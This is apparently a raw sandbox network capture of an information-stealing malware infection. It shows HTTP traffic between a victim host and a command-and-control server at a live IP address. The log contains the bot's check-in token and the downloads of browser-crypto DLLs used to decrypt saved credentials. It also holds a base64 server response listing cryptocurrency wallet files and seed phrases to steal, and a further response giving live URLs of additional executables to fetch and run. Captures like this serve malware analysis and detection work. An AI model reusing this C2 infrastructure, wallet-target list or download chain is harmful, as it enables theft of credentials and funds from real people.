                                                                                        Jul 24, 2024 07:14:14.806658983 CEST561OUTPOST /5499d72b3a3e55be.php HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----BAEHIEBGHDAFIEBGIEHJ
                                                                                        Host: 85.28.47.31
                                                                                        Content-Length: 363
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 42 41 45 48 49 45 42 47 48 44 41 46 49 45 42 47 49 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 30 34 39 61 61 62 63 64 37 61 38 30 63 39 36 35 62 61 38 38 34 38 62 34 32 63 33 34 36 32 39 64 64 33 66 62 30 63 65 61 64 34 62 36 36 30 34 64 39 32 61 30 32 34 61 36 30 61 34 33 30 36 65 38 38 33 33 66 61 62 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 48 49 45 42 47 48 44 41 46 49 45 42 47 49 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 48 49 45 42 47 48 44 41 46 49 45 42 47 49 45 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                        Data Ascii: ------BAEHIEBGHDAFIEBGIEHJContent-Disposition: form-data; name="token"d5049aabcd7a80c965ba8848b42c34629dd3fb0cead4b6604d92a024a60a4306e8833fab------BAEHIEBGHDAFIEBGIEHJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BAEHIEBGHDAFIEBGIEHJContent-Disposition: form-data; name="file"------BAEHIEBGHDAFIEBGIEHJ--
                                                                                        Jul 24, 2024 07:14:15.533466101 CEST202INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:14:14 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Content-Length: 0
                                                                                        Keep-Alive: timeout=5, max=92
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Jul 24, 2024 07:14:15.969386101 CEST561OUTPOST /5499d72b3a3e55be.php HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----JKEBFBFIEHIDAAAAFHCF
                                                                                        Host: 85.28.47.31
                                                                                        Content-Length: 363
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 42 46 42 46 49 45 48 49 44 41 41 41 41 46 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 30 34 39 61 61 62 63 64 37 61 38 30 63 39 36 35 62 61 38 38 34 38 62 34 32 63 33 34 36 32 39 64 64 33 66 62 30 63 65 61 64 34 62 36 36 30 34 64 39 32 61 30 32 34 61 36 30 61 34 33 30 36 65 38 38 33 33 66 61 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 42 46 42 46 49 45 48 49 44 41 41 41 41 46 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 42 46 42 46 49 45 48 49 44 41 41 41 41 46 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                        Data Ascii: ------JKEBFBFIEHIDAAAAFHCFContent-Disposition: form-data; name="token"d5049aabcd7a80c965ba8848b42c34629dd3fb0cead4b6604d92a024a60a4306e8833fab------JKEBFBFIEHIDAAAAFHCFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JKEBFBFIEHIDAAAAFHCFContent-Disposition: form-data; name="file"------JKEBFBFIEHIDAAAAFHCF--
                                                                                        Jul 24, 2024 07:14:16.680569887 CEST202INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:14:16 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Content-Length: 0
                                                                                        Keep-Alive: timeout=5, max=91
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Jul 24, 2024 07:14:17.153449059 CEST90OUTGET /8405906461a5200c/freebl3.dll HTTP/1.1
                                                                                        Host: 85.28.47.31
                                                                                        Cache-Control: no-cache
                                                                                        Jul 24, 2024 07:14:17.333815098 CEST1236INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:14:17 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                        ETag: "a7550-5e7ebd4425100"
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 685392
                                                                                        Content-Type: application/x-msdos-program
                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                        Jul 24, 2024 07:14:18.031193018 CEST90OUTGET /8405906461a5200c/mozglue.dll HTTP/1.1
                                                                                        Host: 85.28.47.31
                                                                                        Cache-Control: no-cache
                                                                                        Jul 24, 2024 07:14:18.222198009 CEST1236INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:14:18 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                        ETag: "94750-5e7ebd4425100"
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 608080
                                                                                        Content-Type: application/x-msdos-program
                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                                        Jul 24, 2024 07:14:18.630716085 CEST91OUTGET /8405906461a5200c/msvcp140.dll HTTP/1.1
                                                                                        Host: 85.28.47.31
                                                                                        Cache-Control: no-cache
                                                                                        Jul 24, 2024 07:14:18.810874939 CEST1236INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:14:18 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                        ETag: "6dde8-5e7ebd4425100"
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 450024
                                                                                        Content-Type: application/x-msdos-program
                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                                        Jul 24, 2024 07:14:19.190727949 CEST87OUTGET /8405906461a5200c/nss3.dll HTTP/1.1
                                                                                        Host: 85.28.47.31
                                                                                        Cache-Control: no-cache
                                                                                        Jul 24, 2024 07:14:19.374381065 CEST1236INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:14:19 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                        ETag: "1f3950-5e7ebd4425100"
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 2046288
                                                                                        Content-Type: application/x-msdos-program
                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                                        Jul 24, 2024 07:14:20.901833057 CEST91OUTGET /8405906461a5200c/softokn3.dll HTTP/1.1
                                                                                        Host: 85.28.47.31
                                                                                        Cache-Control: no-cache
                                                                                        Jul 24, 2024 07:14:21.096641064 CEST1236INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:14:21 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                        ETag: "3ef50-5e7ebd4425100"
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 257872
                                                                                        Content-Type: application/x-msdos-program
                                                                                        Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                                        Jul 24, 2024 07:14:21.424002886 CEST95OUTGET /8405906461a5200c/vcruntime140.dll HTTP/1.1
                                                                                        Host: 85.28.47.31
                                                                                        Cache-Control: no-cache
                                                                                        Jul 24, 2024 07:14:21.604655027 CEST1236INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:14:21 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT
                                                                                        ETag: "13bf0-5e7ebd4425100"
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 80880
                                                                                        Content-Type: application/x-msdos-program
                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                                        Jul 24, 2024 07:14:22.123505116 CEST198OUTPOST /5499d72b3a3e55be.php HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGID
                                                                                        Host: 85.28.47.31
                                                                                        Content-Length: 947
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Jul 24, 2024 07:14:22.945086002 CEST202INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:14:22 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Content-Length: 0
                                                                                        Keep-Alive: timeout=5, max=84
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Jul 24, 2024 07:14:23.009608030 CEST465OUTPOST /5499d72b3a3e55be.php HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----GIEHIDHJDBFIIECAKECB
                                                                                        Host: 85.28.47.31
                                                                                        Content-Length: 267
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 30 34 39 61 61 62 63 64 37 61 38 30 63 39 36 35 62 61 38 38 34 38 62 34 32 63 33 34 36 32 39 64 64 33 66 62 30 63 65 61 64 34 62 36 36 30 34 64 39 32 61 30 32 34 61 36 30 61 34 33 30 36 65 38 38 33 33 66 61 62 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 2d 2d 0d 0a
                                                                                        Data Ascii: ------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="token"d5049aabcd7a80c965ba8848b42c34629dd3fb0cead4b6604d92a024a60a4306e8833fab------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="message"wallets------GIEHIDHJDBFIIECAKECB--
                                                                                        Jul 24, 2024 07:14:23.193823099 CEST1236INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:14:23 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Vary: Accept-Encoding
                                                                                        Content-Length: 2408
                                                                                        Keep-Alive: timeout=5, max=83
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                                        Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                                                                        Jul 24, 2024 07:14:23.196969032 CEST470OUTPOST /5499d72b3a3e55be.php HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----JEBKEHJJDAAAAKECBGHD
                                                                                        Host: 85.28.47.31
                                                                                        Content-Length: 272
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 30 34 39 61 61 62 63 64 37 61 38 30 63 39 36 35 62 61 38 38 34 38 62 34 32 63 33 34 36 32 39 64 64 33 66 62 30 63 65 61 64 34 62 36 36 30 34 64 39 32 61 30 32 34 61 36 30 61 34 33 30 36 65 38 38 33 33 66 61 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 2d 2d 0d 0a
                                                                                        Data Ascii: ------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="token"d5049aabcd7a80c965ba8848b42c34629dd3fb0cead4b6604d92a024a60a4306e8833fab------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="message"ybncbhylepme------JEBKEHJJDAAAAKECBGHD--
                                                                                        Jul 24, 2024 07:14:23.414454937 CEST411INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:14:23 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Vary: Accept-Encoding
                                                                                        Content-Length: 184
                                                                                        Keep-Alive: timeout=5, max=82
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 63 33 4c 6a 6b 78 4c 6a 63 33 4c 6a 67 78 4c 32 31 70 62 6d 55 76 59 57 31 68 5a 47 74 68 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 48 78 6f 64 48 52 77 4f 69 38 76 4e 7a 63 75 4f 54 45 75 4e 7a 63 75 4f 44 45 76 59 32 39 7a 64 43 39 6e 62 79 35 6c 65 47 56 38 4d 48 77 77 66 46 4e 30 59 58 4a 30 66 44 52 38 61 48 52 30 63 44 6f 76 4c 7a 63 33 4c 6a 6b 78 4c 6a 63 33 4c 6a 67 78 4c 33 4e 76 61 32 45 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4d 6e 77 3d
                                                                                        Data Ascii: aHR0cDovLzc3LjkxLjc3LjgxL21pbmUvYW1hZGthLmV4ZXwwfDB8U3RhcnR8NHxodHRwOi8vNzcuOTEuNzcuODEvY29zdC9nby5leGV8MHwwfFN0YXJ0fDR8aHR0cDovLzc3LjkxLjc3LjgxL3Nva2EvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8Mnw=


